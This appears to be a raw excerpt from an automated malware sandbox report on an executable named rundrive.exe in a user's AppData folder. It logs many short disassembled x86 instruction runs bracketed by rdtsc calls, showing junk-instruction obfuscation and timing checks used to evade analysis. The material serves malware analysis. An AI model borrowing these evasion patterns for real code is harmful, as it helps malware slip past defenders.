Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49501F8 second address: 4950218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, dx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop edx 0x00000010 call 00007FDA80C026BEh 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950218 second address: 4950267 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 mov eax, 106F4639h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push dword ptr [ebp+34h] 0x00000010 jmp 00007FDA80C00884h 0x00000015 mov ecx, dword ptr [ebp+08h] 0x00000018 jmp 00007FDA80C00880h 0x0000001d push dword ptr [ebp+30h] 0x00000020 pushad 0x00000021 call 00007FDA80C0087Eh 0x00000026 mov bh, cl 0x00000028 pop ebx 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950267 second address: 49502BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C8h 0x00000009 popad 0x0000000a popad 0x0000000b push dword ptr [ebp+2Ch] 0x0000000e jmp 00007FDA80C026C0h 0x00000013 push dword ptr [ebp+28h] 0x00000016 pushad 0x00000017 mov dx, ax 0x0000001a push eax 0x0000001b push edx 0x0000001c call 00007FDA80C026C8h 0x00000021 pop esi 0x00000022 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49502BA second address: 49502FC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C0087Bh 0x00000008 xor si, CEAEh 0x0000000d jmp 00007FDA80C00889h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push dword ptr [ebp+24h] 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDA80C0087Dh 0x00000020 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49502FC second address: 495034E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDA80C026BAh 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push dword ptr [ebp+20h] 0x0000000f jmp 00007FDA80C026C1h 0x00000014 push dword ptr [ebp+1Ch] 0x00000017 jmp 00007FDA80C026BEh 0x0000001c push dword ptr [ebp+18h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FDA80C026C7h 0x00000026 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 495034E second address: 4950353 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950353 second address: 4950366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+14h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4950366 second address: 495036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 495036A second address: 495036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 495036E second address: 4950374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49202DD second address: 4920315 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C026BDh 0x00000008 and cl, 00000066h 0x0000000b jmp 00007FDA80C026C1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDA80C026BDh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4920315 second address: 4920349 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushfd 0x0000000f jmp 00007FDA80C0087Ah 0x00000014 xor cl, 00000068h 0x00000017 jmp 00007FDA80C0087Bh 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4920349 second address: 492038C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 6F29285Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dx, si 0x0000000c popad 0x0000000d mov ecx, dword ptr [ebp+08h] 0x00000010 jmp 00007FDA80C026BEh 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007FDA80C026BDh 0x0000001e pop esi 0x0000001f call 00007FDA80C026C1h 0x00000024 pop eax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 492038C second address: 49203A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d push eax 0x0000000e push edx 0x0000000f mov dh, 78h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49203E6 second address: 4920468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c push eax 0x0000000d mov bh, D3h 0x0000000f pop ecx 0x00000010 mov ax, bx 0x00000013 popad 0x00000014 mov ecx, esi 0x00000016 jmp 00007FDA80C026C7h 0x0000001b or ecx, edx 0x0000001d jmp 00007FDA80C026C6h 0x00000022 je 00007FDAF1D6679Eh 0x00000028 pushad 0x00000029 call 00007FDA80C026BEh 0x0000002e movzx esi, bx 0x00000031 pop edi 0x00000032 jmp 00007FDA80C026BCh 0x00000037 popad 0x00000038 mov eax, dword ptr [esi+00000088h] 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 mov edi, eax 0x00000043 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4920468 second address: 49204A5 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 mov bx, 44D6h 0x0000000c pop edi 0x0000000d popad 0x0000000e or eax, dword ptr [esi+0000008Ch] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushfd 0x00000018 jmp 00007FDA80C00886h 0x0000001d xor cl, FFFFFFF8h 0x00000020 jmp 00007FDA80C0087Bh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49402FB second address: 49402FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49402FF second address: 4940305 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940305 second address: 494031C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026C3h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 494031C second address: 49403B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FDA80C00885h 0x0000000f mov edx, dword ptr [ebp+10h] 0x00000012 pushad 0x00000013 mov eax, 7BA557F3h 0x00000018 pushfd 0x00000019 jmp 00007FDA80C00888h 0x0000001e or si, CCF8h 0x00000023 jmp 00007FDA80C0087Bh 0x00000028 popfd 0x00000029 popad 0x0000002a sub esp, 20h 0x0000002d jmp 00007FDA80C00886h 0x00000032 mov ecx, dword ptr [ebp+14h] 0x00000035 jmp 00007FDA80C00880h 0x0000003a mov eax, edx 0x0000003c jmp 00007FDA80C00880h 0x00000041 or eax, ecx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 mov edi, eax 0x00000048 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49403B4 second address: 494040D instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C026C8h 0x00000008 or ecx, 1866EC18h 0x0000000e jmp 00007FDA80C026BBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007FDA80C026C6h 0x0000001e or si, 5678h 0x00000023 jmp 00007FDA80C026BBh 0x00000028 popfd 0x00000029 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 494040D second address: 4940440 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov esi, 4C366FA7h 0x0000000f pushfd 0x00000010 jmp 00007FDA80C0087Ch 0x00000015 or cl, FFFFFFD8h 0x00000018 jmp 00007FDA80C0087Bh 0x0000001d popfd 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940440 second address: 4940444 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940444 second address: 494044A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 494044A second address: 4940450 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940450 second address: 4940454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940454 second address: 4940458 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940458 second address: 494047C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FDA80C0087Bh 0x0000000e mov esi, FFFE0000h 0x00000013 pushad 0x00000014 mov bx, si 0x00000017 pushad 0x00000018 mov si, C9BDh 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 494047C second address: 494049F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 xchg eax, edi 0x00000007 pushad 0x00000008 mov al, D3h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDA80C026C7h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 494049F second address: 49404DF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C00888h 0x00000008 adc eax, 2ADE3728h 0x0000000e jmp 00007FDA80C0087Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDA80C0087Bh 0x00000021 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49404DF second address: 49404E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49404E3 second address: 49404E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49404E9 second address: 4940548 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushad 0x0000000c mov cx, 6293h 0x00000010 pushfd 0x00000011 jmp 00007FDA80C026C8h 0x00000016 and cx, 7F18h 0x0000001b jmp 00007FDA80C026BBh 0x00000020 popfd 0x00000021 popad 0x00000022 mov bl, al 0x00000024 popad 0x00000025 test esi, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FDA80C026BEh 0x0000002e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940548 second address: 49405A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA80C00881h 0x00000008 mov dx, si 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jne 00007FDAF1D5BCF5h 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FDA80C00888h 0x0000001b xor esi, 4A841308h 0x00000021 jmp 00007FDA80C0087Bh 0x00000026 popfd 0x00000027 push ecx 0x00000028 movsx ebx, si 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov esi, dword ptr fs:[00000018h] 0x00000034 pushad 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49405A6 second address: 4940690 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FDA80C026C9h 0x00000008 jmp 00007FDA80C026BBh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FDA80C026C6h 0x00000017 sbb al, FFFFFFF8h 0x0000001a jmp 00007FDA80C026BBh 0x0000001f popfd 0x00000020 jmp 00007FDA80C026C8h 0x00000025 popad 0x00000026 popad 0x00000027 mov eax, dword ptr [esi+00000FDCh] 0x0000002d jmp 00007FDA80C026C0h 0x00000032 test eax, eax 0x00000034 jmp 00007FDA80C026C0h 0x00000039 jns 00007FDA80C026EAh 0x0000003f jmp 00007FDA80C026C0h 0x00000044 add esi, eax 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007FDA80C026BEh 0x0000004d xor cl, 00000018h 0x00000050 jmp 00007FDA80C026BBh 0x00000055 popfd 0x00000056 mov ch, 05h 0x00000058 popad 0x00000059 mov eax, dword ptr [esi+000008B0h] 0x0000005f jmp 00007FDA80C026BBh 0x00000064 or eax, dword ptr [esi+000008B4h] 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940690 second address: 49406AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00887h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49406AB second address: 49406DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FDAF1D5D9EEh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDA80C026BDh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49406DD second address: 49406E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49406E3 second address: 49406E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49406E7 second address: 4940707 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDA80C00881h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940707 second address: 494070B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 494070B second address: 4940711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940711 second address: 494071A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, BC29h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 494071A second address: 4940735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDA80C00881h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940735 second address: 4940759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDA80C026BCh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940759 second address: 49407A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDA80C0087Bh 0x00000013 sbb ax, B71Eh 0x00000018 jmp 00007FDA80C00889h 0x0000001d popfd 0x0000001e call 00007FDA80C00880h 0x00000023 pop esi 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49407A9 second address: 49407D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007FDA80C026C4h 0x0000000e mov dword ptr [esp], edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov esi, ebx 0x00000016 mov dx, BABCh 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49407D3 second address: 49407D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49407D9 second address: 49407FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDA80C026BAh 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49407FC second address: 4940802 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940802 second address: 4940813 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C026BDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940813 second address: 494083A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDA80C0087Dh 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 494083A second address: 4940841 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940841 second address: 494086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov esi, 563CCE6Bh 0x0000000e mov edx, ecx 0x00000010 popad 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDA80C00889h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49408E7 second address: 49408EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49408EB second address: 49408EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49408EF second address: 49408F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49408F5 second address: 4940947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007FDA80C00880h 0x00000010 mov dword ptr [ebp-04h], edi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FDA80C0087Dh 0x0000001c add cx, 7B16h 0x00000021 jmp 00007FDA80C00881h 0x00000026 popfd 0x00000027 mov dh, al 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940947 second address: 49409EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FDAF1D5D7E8h 0x0000000f pushad 0x00000010 movzx eax, di 0x00000013 pushad 0x00000014 mov si, bx 0x00000017 movsx edi, cx 0x0000001a popad 0x0000001b popad 0x0000001c mov ecx, dword ptr [esi+04h] 0x0000001f pushad 0x00000020 mov dx, ax 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FDA80C026BBh 0x0000002a jmp 00007FDA80C026C3h 0x0000002f popfd 0x00000030 popad 0x00000031 popad 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 call 00007FDA80C026C4h 0x00000039 call 00007FDA80C026C2h 0x0000003e pop eax 0x0000003f pop edi 0x00000040 pushfd 0x00000041 jmp 00007FDA80C026C0h 0x00000046 jmp 00007FDA80C026C5h 0x0000004b popfd 0x0000004c popad 0x0000004d push eax 0x0000004e pushad 0x0000004f mov dl, 67h 0x00000051 push eax 0x00000052 push edx 0x00000053 mov edx, ecx 0x00000055 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 49409EC second address: 4940A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebx 0x00000006 jmp 00007FDA80C00887h 0x0000000b lea ebx, dword ptr [esi+08h] 0x0000000e pushad 0x0000000f jmp 00007FDA80C00884h 0x00000014 jmp 00007FDA80C00882h 0x00000019 popad 0x0000001a mov edx, ebx 0x0000001c pushad 0x0000001d mov cx, di 0x00000020 popad 0x00000021 call 00007FDAF1D3362Bh 0x00000026 mov edi, edi 0x00000028 push ebp 0x00000029 mov ebp, esp 0x0000002b push ecx 0x0000002c push esi 0x0000002d mov esi, edx 0x0000002f push edi 0x00000030 cmp ecx, 00000107h 0x00000036 jbe 00007FDA80C0088Eh 0x00000038 sub ecx, 0000010Fh 0x0000003e je 00007FDA80C008A8h 0x00000040 sub ecx, 11h 0x00000043 je 00007FDA80C008A3h 0x00000045 sub ecx, 00000166h 0x0000004b je 00007FDA80C0089Bh 0x0000004d xor eax, eax 0x0000004f pop edi 0x00000050 inc eax 0x00000051 pop esi 0x00000052 leave 0x00000053 ret 0x00000054 pushad 0x00000055 mov dx, 4FD8h 0x00000059 pushad 0x0000005a mov dx, 2DA2h 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940A4C second address: 4940A6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test eax, eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007FDA80C026C0h 0x00000010 mov bl, ah 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940A6A second address: 4940A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940A70 second address: 4940A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940A74 second address: 4940A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FDAF1D335E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov ebx, 0897D2B2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940A8C second address: 4940A91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
